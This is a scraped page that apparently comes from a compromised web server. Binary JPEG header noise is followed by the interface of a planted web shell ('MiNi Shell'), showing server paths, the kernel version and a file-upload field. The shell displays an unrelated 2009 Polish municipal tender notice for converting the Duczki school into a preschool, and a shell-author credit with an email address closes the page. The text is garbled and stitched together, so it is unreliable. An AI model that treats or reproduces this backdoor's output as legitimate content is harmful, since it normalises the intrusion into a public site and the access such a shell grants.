JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091008/351622-N-2009.html

<p class="kh_header"><b>Wołomin: Adaptacja pomieszczeń szkoły w Duczkach dla potrzeb przedszkola na terenie działki ew. nr 207/2 i 208/2 obręb 02 , położonych przy ul. Szkolnej 1 w Duczkach - realizacja pod klucz.</b><br>
<b>Numer ogłoszenia: 351622 - 2009; data zamieszczenia: 08.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wołomin , ul. Ogrodowa 4, 05-200 Wołomin, woj. mazowieckie, tel. 02 7633000, faks 022 7633066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wolomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja pomieszczeń szkoły w Duczkach dla potrzeb przedszkola na terenie działki ew. nr 207/2 i 208/2 obręb 02 , położonych przy ul. Szkolnej 1 w Duczkach - realizacja pod klucz..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: roboty budowlano - montażowe związane z przebudową  pomieszczeń Szkoły Podstawowej w Duczkach ze zmianą sposobu użytkowania na cele publicznego przedszkola wraz z budową niezbędnej  infrastruktury technicznej i obsługi komunikacyjnej, na terenie działki ew. nr 207/2 i 208/2 obręb 02 , położonych przy ul. Szkolnej 1 w Duczkach - realizacja pod klucz w ramach zadania inwestycyjnego pn. .Adaptacja pomieszczeń szkoły w Duczkach dla potrzeb przedszkola.
Przebudowa pomieszczeń szkoły dla potrzeb przedszkola będzie wykonywana na podstawie projektów budowlano - wykonawczych stanowiących - Zał. Nr 1A do SIWZ, szczegółowej specyfikacji technicznej wykonania i odbioru robót budowlanych - Zał. Nr 1B do SIWZ oraz zgodnie z pozwoleniem na budowę.
Zakres przedmioty zamówienia obejmuje również:
1) opracowanie dokumentacji powykonawczej, dokonanie niezbędnych inwentaryzacji geodezyjnych, opracowanie instrukcji bezpieczeństwa ppoż, instrukcji obsługi wykonanych instalacji i zamontowanych urządzeń (pożądana forma elektroniczna - na płycie cd), wykonanie świadectwa energetycznego budynku, przeszkolenie personelu konserwatorskiego użytkownika w zakresie budowy urządzeń i kontroli ich pracy.
2) dokonanie niezbędnych prób technicznych wykonanych instalacji i zamontowanych urządzeń, wykonanie rozruchu technologicznego, protokólarne przekazanie przedmiotu umowy do eksploatacji z czynnym udziałem przedstawicieli Zamawiającego;
3) uzyskanie w imieniu Zamawiającego pozwolenia na użytkowanie obiektu zgodnie z obowiązującymi przepisami prawa.
Kompleks szkolny składa się z części: A, B, C, D, E, F i nie jest całkowicie użytkowany. Szkoła obecnie użytkuje części A, B i F w całości, natomiast budynki C, D i E nie są całkowicie wykończone i są użytkowane częściowo. Przebudowa pomieszczeń szkoły na cele publicznego przedszkola w budynku dotyczy części: C, D i E;
Dane liczbowe, dotyczące pomieszczeń modernizowanej części: 
Powierzchnia zabudowy   -  1624,78 m2
Powierzchnia użytkowa  -  1389,23 m2
Powierzchnia komunikacji    -    545,35 m2
Powierzchnia ogólna  -  1934,58 m2
Kubatura  -  8950,80 m3
Program użytkowy przebudowanej części budynku szkoły dla potrzeb przedszkola określony jest w  projekcie budowlano - wykonawczym, wykonanym przez Usługi Projektowe - Aleksander Kania, 01-708 Warszawa ul. Słodowiec 5a/39, składającym się z następujących części:
1) część 1 - Projekt zagospodarowania terenu
2) cześć 2 - Architektura
3) cześć 2.1. - Informacja BIOZ
4) część 2.2. - Założenia dźwigowe
5) część 3 - Konstrukcja
6) część 4 - Technologia
7) część 5 - instalacje sanitarne w tym część 5.1. Instalacja wodno - kanalizacyjna, 5.2 - Instalacja hydrantowa, część 5.3.- Instalacja c.o. i c.t., cześć 5.4.- Instalacja wentylacji mechanicznej, cześć 5.5.- Instalacja gazowa,
8) część 6 - Instalacje elektryczne,
9) część 7 Instalacja ppoż. Napowietrzanie klatek schodowych,
10) część 8 - architektura wnętrz
11) część 9 - drogi
12) część 10 - zieleń
13) część 11 -  mała architektura
14) Projekt zjazdu
Szczegółowy zakres robót określony jest w przedmiarach wykonanych przez Usługi Projektowe - Aleksander Kania, 01-708 warszawa ul. Słodowiec 5a/39 ( Zał. Nr. 1 C do SIWZ - przedmiary robót należy traktować jako pomocnicze do prawidłowego ustalenia wartości zamówienia):
1) przedmiary robót związanych z zagospodarowaniem terenu;
2) przedmiar robót w branży remonto - budowlanej;
3) przedmiar wyposażenia technologicznego;
4) przedmiar oddymianie ewakuacyjnych klatek schodowych;
5) przedmiar instalacja c.o. i c.t.;
6) przedmiar instalacja wod-kan
7) przedmiar instalacja gazowa;
8) przedmiar instalacja wentylacji mechanicznej;
9) przedmiar branża elektryczna.
Zamawiający zobowiązuje wykonawcę do ujęcia w kalkulacji (ofercie) kosztów materiałów zgodnych z  projektem budowlano - wykonawczym, przedmiarem oraz specyfikacją techniczną. Wskazane znaki towarowe, patenty lub pochodzenie materiałów i urządzeń służą jako pomocnicze, dopuszcza się zastosowanie materiałów, urządzeń i innych wyrobów równoważnych pod warunkiem uzyskania parametrów technicznych równych lub lepszych niż uzyskane poprzez  realizację wg wskazań dokumentacji technicznej oraz pod warunkiem, ze ich zastosowanie nie spowoduje konieczności przeprojektowania rozwiązań zawartych w dokumentacji technicznej i nie naruszy warunków decyzji pozwolenia na roboty budowlane.
Cena ofertowa musi zawierać wszystkie koszty związane z realizacją zadania, wynikające wprost z przedmiaru robót i dokumentacji technicznej, jak również koszty obowiązków wykonawcy opisanych w przedmiocie zamówienia oraz we wzorze umowy.
Cenę oferty stanowi suma wartości wszystkich jej elementów, zawierająca wszystkie koszty niezbędne do wykonania zamówienia. Cena określona przez wykonawcę zostanie ustalona na okres ważności umowy i nie będzie podlegać zmianom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości: 63 500,00 zł., słownie: sześćdziesiąt trzy  tysiące pięćset  złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział WYKONAWCY, którzy spełniają warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.):

1)posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy).
 Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.   oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - Zał. nr 2 do SIWZ,
   2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej - wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
   3. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; 
     4. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
     5. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
    6. wykaz wykonanych robót a w przypadku świadczeń okresowych lub ciągłych również wykonywane roboty w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, - co najmniej 2 zamówienia  odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia tzn. co najmniej dwie roboty remontowe lub ogólnobudowlane w obiektach użyteczności publicznej o wartości min 2 mln zł. brutto , z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (tj. referencje, protokół odbioru końcowego itp.)- Załącznik NR 3 do SIWZ,
7.wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą sprawować funkcję kierownictwa przedmiotowych robót. Osoby te: 
a) kierownik budowy posiadać musi uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej (inżynieryjnej), bez ograniczeń, aktualne zaświadczenie o przynależności do odpowiedniej izby samorządu zawodowego (na potwierdzenie należy dołączyć kopię uprawnień, kopię zaświadczenia o wpisie do Izby);
b) kierownik robót sanitarnych posiadać musi uprawnienia budowlane w specjalności instalacyjnej z zakresu: sieci, instalacji, urządzeń cieplnych, wentylacyjnych - bez ograniczeń, aktualne zaświadczenie o przynależności do odpowiedniej izby samorządu zawodowego (na potwierdzenie należy dołączyć kopię uprawnień, kopię zaświadczenia o wpisie do Izby);
c) kierownik robót elektrycznych posiadać musi uprawnienia budowlane w specjalności instalacyjnej z zakresu: sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń, aktualne zaświadczenie o przynależności do odpowiedniej izby samorządu zawodowego (na potwierdzenie należy dołączyć kopię uprawnień, kopię zaświadczenia o wpisie do Izby); - Zał. nr 4 do SIWZ
  8. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
  9. dokumenty potwierdzające posiadanie środków finansowych lub zdolność kredytową nie mniejszą, niż 1.000 000,00 zł.
  10. polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 1.000.000zł.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.wolomin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Ogrodowa 4, 05-200 Wołomin. pok.223..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 10:00, miejsce: Urząd Miejski, ul. Ogrodowa 4, 05-200 Wołomin, Kancelaria Urzędu, stanowiska 1,2,3..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com